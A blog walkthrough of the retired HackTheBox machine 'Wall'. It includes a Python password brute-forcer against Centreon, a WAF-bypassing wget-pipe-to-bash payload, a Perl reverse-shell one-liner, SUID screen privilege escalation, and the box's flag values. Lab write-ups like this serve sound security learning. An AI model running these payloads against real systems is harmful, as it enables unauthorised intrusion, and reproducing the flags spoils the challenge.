Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Wall
|htbmachinesretired|

Summary

Wall,a Linux box created by HackTheBox user askar, was an overall medium difficulty box.The initial foothold was finding the cred for centreon server and the seeing the version is vulnerable and have a RCE using that, we get the reverse shell and user. Privilege Escalation was super simple after enumerating we find screen is a SUID and have a exploit on SearchSploit for that version. Using that we get the root shell.

Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Nmap 7.70 scan initiated Wed Sep 18 10:12:11 2019 as: nmap -sC -sV -oN nmap/wall 10.10.10.157
Nmap scan report for 10.10.10.157
Host is up (0.13s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2e:93:41:04:23:ed:30:50:8d:0d:58:23:de:7f:2c:15 (RSA)
|   256 4f:d5:d3:29:40:52:9e:62:58:36:11:06:72:85:1b:df (ECDSA)
|_  256 21:64:d0:c0:ff:1a:b4:29:0b:49:e1:11:81:b6:73:66 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 18 10:13:03 2019 -- 1 IP address (1 host up) scanned in 52.13 seconds

We see only port 22 and port 80 is open.
Enumerating more we find /monitoring to be interesting but doing a GET request on that we see we are asked for a user name and password. But doing a POST request we see we are redirected to /centreon.

Accessing this new App we discovered that this version 19.04 of centreon is being used.

Searching centreon in searchsploit we can see that this version is vulnerable to authenticated RCE.

Its look like we need to grab some valid credentials, but default ones (admin:centreon) are not working.

I wrote this script to brute-force the authentication.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import requests
import sys
import re

login = 'http://10.10.10.157/centreon/api/index.php?action=authenticate'
user= "admin"
pass_list=<wordlist>

def url_request(username, password):
    data = {
        "username": username,
        "password": password
    }

    try:
        r = requests.post(login, data=data)

    except:
        print "\n\n[!] url_request: Failed to connect .\n[i] Quitting." % (login)
        sys.exit(-1)
    print r.text
    return r.status_code
def brute_force():
    # Load in wordlists files
    with open(pass_list) as password:
        password = password.readlines()
    # Counter
    i = 0
    # Loop around
    for PASS in password:
            USER = "admin"
            PASS = PASS.rstrip('\n')
            i += 1
            print ("[i] Try %s: %s::%s" % (i, USER, PASS))
            attempt = url_request(USER, PASS)
            # Check response
            if attempt != 403:
                print ("\n\n[i] Found!")
                print "[i] Username: %s" % (USER)
                print "[i] Password: %s" % (PASS)
                return True
    return False




brute_force()

After few minutes we can find the valid password: password1.

Now that we have valid credentials we can try to use the RCE exploit. But it will not work because of there is a WAF that is blacklisting some bash commands and some symbols (like space).

Every time the WAF discovers something malicious a 403 is returned.

After playing around with the exploit i was able to get it working.

1
payload = """wget${{IFS}}-qO-${{IFS}}http://{0}:8888/payload.sh${{IFS}}|${{IFS}}bash;""".format(ip, port)

to the above to let the script do a get request on our machine and get a payload.sh which contain a reverse shell.

1
perl -e 'use Socket;$i="10.10.X.X";$p=53;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Trying that we see we were able to do a get request but we didn’t get a shell back.

This can mean there is a firewall which is preventing to get us a shell.Trying some common ports we see we can get a reverse shell back on port 53 as that was allowed by the firewall.

We get the connection back and we can read the user.txt

fe6194544f452f62dc905b12f8da8406

Privilege Escalation

Running LinEnum.sh. We see that /bin/screen-4.5.0 is present and is a SUID binary.

Searching on searchsploit we see an exploit for the used version.

Using that we get root on this box.

and we can read root.txt 1fdbcf8c33eaa2599afdc52e1b4d5db7

and we have pwned Wall 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/wall/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteupretiredhacktheboxmediumsuidcentreonscreen